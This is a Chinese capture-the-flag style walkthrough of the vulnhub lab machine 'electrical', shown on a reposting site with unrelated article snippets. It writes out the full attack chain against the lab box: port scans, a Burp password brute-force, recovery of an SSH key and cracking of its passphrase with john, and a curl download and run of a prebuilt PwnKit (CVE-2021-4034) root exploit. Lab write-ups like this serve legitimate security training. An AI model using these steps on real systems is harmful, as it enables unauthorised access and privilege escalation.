“网站制作”/湖南关键词网络科技有限公司

“网站制作”,湖南关键词网络科技有限公司,响应式新闻网站模板,三 网站建设前言 靶机:digitalworld.local-electrical,IP地址为192.168.10.12,后期因为卡顿,重新安装,ip地址后面为192.168.10.11 攻击:kali,IP地址为192.168.10.6 kali采用VMware虚拟机,靶机…

前言

靶机:digitalworld.local-electrical,IP地址为192.168.10.12,后期因为卡顿,重新安装,ip地址后面为192.168.10.11

攻击:kali,IP地址为192.168.10.6

kali采用VMware虚拟机,靶机选择使用VMware打开文件,都选择桥接网络

这里官方给的有两种方式,一是直接使用virtualbox加载,另一种是通过VMware直接加载,也给出了iso镜像文件。

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者通过网盘下载https://pan.quark.cn/s/86cf8a398835

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

信息收集

使用nmap扫描端口

扫描tcp端口,并保存于nmap-tcp

nmap -sT 192.168.10.12 --min-rate=1000 -p- -oA nmap-tcp

扫描常见的20个udp端口,不过这里的端口大部分都是不确定的情况

nmap -sU 192.168.10.12 --top-ports 20 -T4 -oA nmap-udp

把前面扫描出的tcp、udp端口,进行处理,只取端口号

grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','
#这里就是包括可能开放的端口都不要,因为是靶机,可能过滤的话,也会无法进一步扫描
ports=22,80,8080,68,69,138,161,631,1434,1900

对特定的端口号进行深入探测

nmap -sV -O -sC -sT 192.168.10.12 -p $ports -oA detail

使用脚本检测有无漏洞

nmap --script=vuln 192.168.10.12 -p $ports -oA vuln

SMB探测

使用enum4linux尝试进行枚举,发现两个分享print$IPC$,并还有两个用户govindasamyelectrical

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

10

8834端口探测

这里需要注意,使用浏览器访问时需要加上https协议

https://192.168.10.12:8834

查看页面源代码也没有信息泄露,那么尝试识别一下,使用whatweb测试

再使用浏览器插件wappalyzer识别

尝试进行目录爆破,可以使用dirbdirsearch进行测试

dirsearch -u https://192.168.10.12:8834 -x 403,404 -e js,txt,zip,bak,cfm,dbm

发现有api,访问之后,发现有很多功能

测试这些api功能后,基本上都是需要登录的,无意义

网站密码爆破

尝试进行抓取数据包然后爆破,以前面两个用户名为测试,我这里是使用burp

选择攻击点、攻击模式、以及字典的选择

这里的默认字典,只有burp pro版本中有,若使用社区版,可以加载密码字典,比如加载kali中的/usr/share/wordlists/fasttrack.txt字典或rockyou.txt也行

开始攻击后,等一会即可发现成功获取一个,用户名govindasamy和弱密码password

敏感信息泄露

下面的靶机因为重装,ip地址更改为192.168.10.11

输入密码进行登录,登录后发现是nessus的漏洞扫描的web界面,之前也搜索过对应版本的nessus漏洞,发现并没有可利用的,那么在这个web ui界面进行探测。

这里建议使用burp抓取全程的数据包

在测试scan中的credentialed check时,点击其配置configuration,发现一个文本域,向下居然有内容,并且还是某一个的私钥,这个可能是靶机上的,也只是可能,需要进一步测试

把这个内容复制并保存在kali中的一个文件中

并且在配置中,默认的账户就是electrical

尝试进行登录可以明显的看到,对私钥进行了加密操作

chmod 600 id1
ssh electrical@192.168.10.11 -p 22222 -i id1

这里先使用john进行破解测试

ssh2john id1 > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

可以看到密码就是用户名,啧,之前好像在哪里看到过,好像在burp抓包的时候与发现ssh私钥的同一界面,不过无所谓了

靶机内信息收集

使用ssh进行登录

查看local.txt文件

查看当前靶机内有哪些用户

ls -al /home
cat /etc/passwd | grep /bin/bash

查看网络状态连接

ss -antulp
netstat -antulp

查看ip地址状态

ip add

查看系统进程

ps aux | grep root
top

使用find寻找具有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

发现有sudo,但是这里不知道electrical的密码,测试后,发现果然需要密码,所以暂时搁置

查看内核版本及系统版本

uname -a
uname -r 
cat /etc/issue
cat /etc/*release
lsb_release

查看定时任务

crontab -l
cat /etc/crontab
atq

注意,下面的脚本上传,都是我个人kali的路径,所以要自行更改的,并且下面的脚本都是在github上的项目,可自行去搜索下载。当然为了自己方便,我会放置在自己的网盘中的

通过scp上传pspy64检测是否有隐藏的任务

#在kali上执行该命令,通过scp传输
scp -P 22222 -i ../digital/electrical/id1 pspy64 electrical@192.168.10.11:/tmp

不过在靶机上执行pspy64后,并未有什么发现

那么再上传一个脚本linpeas.sh,用于检测

#在kali上执行该命令,通过scp传输
scp -P 22222 -i ../digital/electrical/id1 linpeas.sh electrical@192.168.10.11:/tmp

检测后,也是没有任何收获,不过还是看到一些东西,如第三方工具gcc等,并没有安装,也就表示无法在靶机内编译文件,也看到了可能存在的漏洞

提权

之前经过使用find寻找具有SUID权限文件时,发现有/usr/libexec/polkit-agent-helper-1/usr/bin/pkexec,结合前面的pwnkit漏洞的发现,也就是CVE-2021-4034,猜测也许可以利用

通过AI搜索,以下为内容

CVE-2021-4034(PwnKit)漏洞:

​ 主要利用了具有 SUID 权限的 /usr/bin/pkexec 文件来实现提权

pkexec 是 PolicyKit 提供的一个工具,用于以特权用户(通常是 root)身份执行命令。

PolicyKit 是一个用于在 Linux 系统上管理特权操作的框架,pkexec 本身被设计为一个安全机制,用于在用户请求执行特权操作时进行权限验证。

然而,CVE - 2021 - 4034 漏洞的存在使得攻击者可以绕过 pkexec 的权限验证机制。该漏洞是由于 pkexec 在处理环境变量时存在缓冲区溢出漏洞,攻击者可以构造恶意的环境变量,使得 pkexec 在执行过程中出现内存错误,从而改变程序的执行流程,最终以 root 权限执行任意命令。

下面是github中的一些poc,因为这里无法直接在靶机编译,所以使用编译好的文件,github项目地址为https://github.com/ly4k/PwnKit

采用这个编译好的

首先下载到kali中,然后通过scp下载到靶机内

#下载
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit#传输
scp -P 22222 -i /id1 PwnKit electrical@192.168.10.11:/tmp

然后在靶机上加上执行权限后直接执行

chmod +x PwnKit
./PwnKit

提权成功,查看/root目录下的文件

总结

该靶机的考察如下:

  1. 对于不存在漏洞的网站,并且需要登录才能看到内容,而且不支持注册的网站,或许爆破是最好的手段了,这里的爆破不仅仅包括密码爆破
  2. 存在smb服务的,都可以枚举一下用户,这个会有用处的
  3. 对于网站中的信息,也就是每一个模块,最好就是通过burp抓取数据包,至少要有历史记录,这样复盘很轻松。且网站中可能存在的隐藏信息,不一定通过页面源代码就能看到,建议使用浏览器的开发者工具,这里就是通过发现了一个私钥文件,才有下一步的
  4. ssh的私钥文件,对于设置密码的,可以通过john套件进行处理,ssh2john转换,john破解
  5. 对于提权,这里借助的是几个脚本pspy64、linpeas.sh发现的,当然还是配合find寻找到的SUID权限文件结合起来的。
  6. 考察pwnkit提权,也就是cve-2021-4034,这个可以通过github下载

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/71925.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

macos 程序 运行

sudo xattr -r -d com.apple.quarantine [/Applications/Name]使用stow 管理配置文件

共享内存的原理和创建

目录 共享内存的原理 共享内存的创建 代码实现创建 共享内存的管理指令 我们今天来学习共享内存!!! 共享内存的原理 两个进程同时使用内存中开辟的共享空间进行通信就是建立并使用共享内存进行进程间的通信。System V 共享内存&#xf…

3.10[A]cv

核心模块: rasterizer:光栅化器,负责三角形遍历和像素绘制Shader:包含顶点着色器和多种片元着色器Texture:纹理处理模块 顶点着色器的计算量一般远小于片元着色器。因为组成三角形的顶点相对有限,而片元需…

mac使用Homebrew安装miniconda(mac搭建python环境),并在IDEA中集成miniconda环境

一、安装Homebrew mac安装brew 二、使用Homebrew安装miniconda brew search condabrew install miniconda安装完成后的截图: # 查看是否安装成功 brew list环境变量(无需手动配置) 先执行命令看能不能正常返回,如果不能正常…

WWDG窗口看门狗原理

WWDG(窗口看门狗)在窗口期喂狗 作用: 原理: 框图 WWDG寄存器: WWDG_CR控制寄存器 WWDG_CFR配置寄存器 状态寄存器WWDG_SR 超时时间计算公式 最小最大超时值 HAL配置函数: 1. IWDG 和 WWDG 的区别 IWDG&…

无公网IP也能远程控制Windows:Linux rdesktop内网穿透实战

文章目录 前言1. Windows 开启远程桌面2. Linux安装rdesktop工具3. Win安装Cpolar工具4. 配置远程桌面地址5. 远程桌面连接测试6. 设置固定远程地址7. 固定地址连接测试 前言 如今远程办公已经从一种选择变成了许多企业和个人的必修课,而如何在Linux系统上高效地访…

Pygame实现射击鸭子游戏3-2

2 鸭子类Target的创建 2.1 __init__()函数 Target类的__init__()函数代码如图5所示。 图5 __init__()函数代码 其中,第18行将Target类声明为pygame.sprite.Sprite类的子类;第19行代码中,__init__()函数的img_path参数表示鸭子图片的文件名…

五、OpenGL中Shader与C++数据传输

文章目录 一、概述二、Shader 代码文件的基本格式三、Shader的向量语法介绍四、Shader之间的数据传输五、Shader与C的数据传输uniform六、完整示例 一、概述 在 OpenGL 中,Shader(着色器)使用 GLSL(OpenGL Shading Language&…

【3DMAX插件】3DMAX建筑大师插件MasterBuilder使用方法

3DMAX建筑大师插件是一款专为3DMAX设计的程序化(参数化)建筑建模工具,其最大特点是能够一键生成建筑模型,极大地提升了工作效率。该插件配备了多种结构控制选项,涵盖阳台、门窗、栏杆、楼顶水塔等附属建筑元素&#xf…

隐私保护在 Facebook 用户身份验证中的应用

在这个数字化的时代,个人隐私保护成为了公众关注的焦点。社交媒体巨头 Facebook 作为全球最大的社交平台之一,拥有数十亿用户,其在用户身份验证过程中对隐私保护的重视程度直接影响着用户的安全感和信任度。本文将探讨 Facebook 在用户身份验…

Swift Package Manager (SPM) 创建并集成本地库

在macOS 项目中,使用 Swift Package Manager (SPM) 创建并集成本地库的完整步骤。 创建一个macos应用程序,选择 swift、oc、swiftui都可以。 创建好应用之后,开始创建SPM本地库。 打开终端app,进入项目根目录,逐次输…

渗透测试之利用sql拿shell(附完整流程+防御方案)【下】

导读: 时刻保持谦逊,始终保持学习,探寻事物的本质,不要把事情复杂化 话不多说,书接上回 三、利用日志getshell 利用条件: 拥有网站的写入权限知道网站的绝对路径数据库日志开启 实际操作: (1)查看数据库日志是否开启以及路径 show variables like %general%; (2…

【HarmonyOS Next之旅】DevEco Studio使用指南(二)

目录 1 -> 工程模板介绍 2 -> 创建一个新的工程 2.1 -> 创建和配置新工程 2.1.1 -> 创建HarmonyOS工程 2.2.2 -> 创建OpenHarmony工程 1 -> 工程模板介绍 DevEco Studio支持多种品类的应用/元服务开发,预置丰富的工程模板,可以根…

猫耳大型活动提效——组件低代码化

1. 引言 猫耳前端在开发活动的过程中,经历过传统的 pro code 阶段,即活动页面完全由前端开发编码实现,直到 2020 年接入公司内部的低代码活动平台,满足了大部分日常活动的需求,运营可自主配置活动并上线,释…

深度学习系列79:Text2sql调研

参考 https://github.com/topics/text-to-sql 这里是一些资源:https://github.com/eosphoros-ai/Awesome-Text2SQL/blob/main/README.zh.md 这里是综述文章:https://zhuanlan.zhihu.com/p/647249972 1. 数据集 Spider: 一个跨域的复杂text2sql数据集&a…

Linux 系统负载过高的排查思路

技术探讨:Linux系统负载过高的排查思路 在Linux服务器运行过程中,如果系统负载过高,可能会导致性能下降和服务不稳定。以下是针对Linux系统负载过高问题的排查思路和解决方法: 1. 查看系统负载: 使用uptime或top命令查…

【互联网性能指标】QPS/TPS/PV/UV/IP/GMV/DAU/MAU/RPS

📕我是廖志伟,一名Java开发工程师、《Java项目实战——深入理解大型互联网企业通用技术》(基础篇)、(进阶篇)、(架构篇)清华大学出版社签约作家、Java领域优质创作者、CSDN博客专家、…

Java高频面试之集合-08

hello啊,各位观众姥爷们!!!本baby今天来报道了!哈哈哈哈哈嗝🐶 面试官:详细说说CopyOnWriteArrayList CopyOnWriteArrayList 详解 CopyOnWriteArrayList 是 Java 并发包(java.util…

痉挛性斜颈需要做手术吗?

痉挛性斜颈的治疗是一个涉及多种医学知识的话题,让我们从多方面分析这个问题,来谈谈是否需要进行手术。 首先,我们要明确痉挛性斜颈是一种什么疾病。痉挛性斜颈是一种颈部肌肉异常收缩的疾病,可能导致头部持续或间歇性地向一侧旋…

AOT是什么?

https://www.bilibili.com/video/BV1Es4y1q7Bf?spm_id_from333.788.player.switch&vd_source12d5954938d20d50645e227a6a728c76&p87常规的java代码是即时解释执行的,只有热点代码才会提前编译成二进制,并且将java代码放到别的电脑执行时得安装j…